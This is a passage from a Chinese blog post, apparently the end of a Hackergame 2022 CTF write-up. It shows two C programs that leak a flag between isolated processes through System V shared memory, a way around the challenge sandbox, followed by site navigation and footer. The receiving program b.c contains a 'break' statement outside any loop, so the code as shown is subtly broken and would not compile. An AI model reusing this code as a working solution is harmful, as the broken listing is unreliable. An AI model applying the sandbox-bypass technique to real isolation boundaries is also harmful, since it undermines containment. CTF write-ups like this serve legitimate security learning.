class="number">0666</span>);</span><br><span class="line">    <span class="type">void</span> *addr = shmat(id, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(addr, buffer, <span class="keyword">sizeof</span>(buffer));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// b.c</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/shm.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span> &#123;</span><br><span class="line">    <span class="type">int</span> id = shmget(<span class="number">1111</span>, <span class="number">0x1000</span>, IPC_CREAT | <span class="number">0666</span>);</span><br><span class="line">    <span class="type">void</span> *addr = shmat(id, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> buffer[<span class="number">1024</span>];</span><br><span class="line">    <span class="built_in">memcpy</span>(buffer, addr, <span class="keyword">sizeof</span>(buffer));</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strlen</span>(buffer)) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%s\n&quot;</span>, buffer);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>这样就可以获取 flag 了。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://Kn1GhT897.github.io">Kn1GHT</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://kn1ght897.github.io/2022/10/26/hackergame-2022/">https://kn1ght897.github.io/2022/10/26/hackergame-2022/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://Kn1GhT897.github.io" target="_blank">Kn1GHT's blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/12/30/matiji-class-resource-spider/"><img class="prev-cover" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">码蹄集-课程资源爬虫</div></div></a></div><div class="next-post pull-right"><a href="/2022/01/27/verification-code-PyTorch/"><img class="next-cover" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">利用PyTorch实现简单验证码识别</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/avatar.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Kn1GHT</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">3</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/Kn1GhT897"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">蒟蒻 Kn1GHT 的博客</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#hackergame-2022-%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3"><span class="toc-number">1.</span> <span class="toc-text">hackergame 2022 部分题解</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%93%E6%9E%9C"><span class="toc-number">1.1.</span> <span class="toc-text">结果</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E8%A7%A3"><span class="toc-number">1.2.</span> <span class="toc-text">题解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#HeiLang"><span class="toc-number">1.2.1.</span> <span class="toc-text">HeiLang</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E8%83%8C%E6%99%AF"><span class="toc-number">1.2.1.1.</span> <span class="toc-text">题目背景</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.2.2.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Xcaptcha"><span class="toc-number">1.2.3.</span> <span class="toc-text">Xcaptcha</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8C%9C%E6%95%B0%E5%AD%97"><span class="toc-number">1.2.4.</span> <span class="toc-text">猜数字</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E7%9A%84%E5%9C%A8%E7%BA%BF%E6%B5%8B%E8%AF%84"><span class="toc-number">1.2.5.</span> <span class="toc-text">安全的在线测评</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%97%A0%E6%B3%95-AC-%E7%9A%84%E9%A2%98%E7%9B%AE"><span class="toc-number">1.2.5.1.</span> <span class="toc-text">无法 AC 的题目</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BC%A0%E8%BE%BE%E4%B8%8D%E5%88%B0%E7%9A%84%E6%96%87%E4%BB%B6"><span class="toc-number">1.2.6.</span> <span class="toc-text">传达不到的文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9C%8B%E4%B8%8D%E8%A7%81%E7%9A%84%E5%BD%BC%E6%96%B9"><span class="toc-number">1.2.7.</span> <span class="toc-text">看不见的彼方</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E8%83%8C%E6%99%AF-1"><span class="toc-number">1.2.7.1.</span> <span class="toc-text">题目背景</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="toc-number">1.2.7.2.</span> <span class="toc-text">解题过程</span></a></li></ol></li></ol></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/12/30/matiji-class-resource-spider/" title="码蹄集-课程资源爬虫">码蹄集-课程资源爬虫</a><time datetime="2022-12-30T08:10:00.000Z" title="发表于 2022-12-30 16:10:00">2022-12-30</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/10/26/hackergame-2022/" title="hackergame-2022">hackergame-2022</a><time datetime="2022-10-25T16:00:00.000Z" title="发表于 2022-10-26 00:00:00">2022-10-26</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/01/27/verification-code-PyTorch/" title="利用PyTorch实现简单验证码识别">利用PyTorch实现简单验证码识别</a><time datetime="2022-01-26T16:00:00.000Z" title="发表于 2022-01-27 00:00:00">2022-01-27</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2023 By Kn1GHT</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"><script>(() => {
  const $mermaidWrap = document.querySelectorAll('#article-container .mermaid-wrap')
  if ($mermaidWrap.length) {
    window.runMermaid = () => {
      window.loadMermaid = true
      const theme = document.documentElement.getAttribute('data-theme') === 'dark' ? 'dark' : 'default'

      Array.from($mermaidWrap).forEach((item, index) => {
        const mermaidSrc = item.firstElementChild
        const mermaidThemeConfig = '%%{init:{ \'theme\':\'' + theme + '\'}}%%\n'
        const mermaidID = 'mermaid-' + index
        const mermaidDefinition = mermaidThemeConfig + mermaidSrc.textContent
        mermaid.mermaidAPI.render(mermaidID, mermaidDefinition, (svgCode) => {
          mermaidSrc.insertAdjacentHTML('afterend', svgCode)
        })
      })
    }

    const loadMermaid = () => {
      window.loadMermaid ? runMermaid() : getScript('https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js').then(runMermaid)
    }

    window.pjax ? loadMermaid() : document.addEventListener('DOMContentLoaded', loadMermaid)
  }
})()</script></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>